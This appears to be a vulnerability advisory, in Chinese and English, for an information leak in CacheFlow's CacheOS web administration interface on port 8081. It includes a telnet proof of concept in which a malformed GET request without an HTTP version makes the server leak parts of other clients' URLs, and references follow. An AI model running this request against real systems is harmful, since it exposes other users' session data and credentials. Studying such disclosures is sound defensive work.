https://www.exploit-db.com/exploits/21212
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200203-081

CacheOS是CacheFlowweb缓冲系统设计和发行的固件，由CacheFlow维护。CacheOS存在一个开放8081端口的WEB管理接口，其中存在访问验证漏洞，发送特殊请求可以导致远程用户获得部分缓冲的页面。当远程用户通过WEB管理接口8081端口进行连接的时候，提交HTTP标准请求给系统，由Cacheserver管理的信息会防止用户访问。但是如果远程用户连接系统并多次发送没有任何HTTP版本类型的请求(如HTTP/1.0或者HTTP/1.1)，可导致Cache服务程序泄露部分信息给连接用户，导致敏感信息如用户名、密码等泄露给攻击者。通过这些敏感信息可以使攻击者进一步对系统进行攻击。

source: http://www.securityfocus.com/bid/3841/info

CacheOS is the firmware designed and distributed with CacheFlow web cache systems. It is maintained and distributed by CacheFlow.

When a user connects to the system via the web administration interface on port 8081, and issues an HTTP standard-compliant request to the system, the system will prevent the user from accessing any information managed by the cache server. However, a user connecting to the system and issuing a request without the HTTP version request type (i.e. HTTP/1.0 or HTTP/1.1) multiple times may gain access to sensitive information. The cache server will leak information such as parts of URLs being accessed by a client currently connected to the cache server.

This problem makes it possible for a user to gather information, and potentially gain access to passwords, userids, or other potentially sensitive information. 

localhost:~# telnet cacheflow 8081
Trying xxx.xxx.xxx.xxx...
Connected to cacheflow.
Escape character is '^]'.
GET /Secure/Local/console/cmhome.htm

HTTP/1.0 404-Not Found

<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The
request
ed URL "/Secure/Local/console/cmhome.htm

Easp&o=0&sv=za5cb0d78&qid=E2BCA8F417ECE94DBDD27B75F951FFDA&uid=2c234acbec234
acbe
&sid=3c234acbec234acbe&ord=1" was not found on this
server.<P></BODY>Connection
closed by foreign host.

来源:BID
名称:3841
链接:http://www.securityfocus.com/bid/3841
来源:XF
名称:cachos-insecure-web-interface(7835)
链接:http://www.iss.net/security_center/static/7835.php
来源:BUGTRAQ
名称:20020205RE:svindel.netsecurityadvisory-webadminvulnerabilityinCacheOS
链接:http://online.securityfocus.com/archive/1/254167
来源:BUGTRAQ
名称:20020108svindel.netsecurityadvisory-webadminvulnerabilityinCacheOS
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=101052887431488&w;=2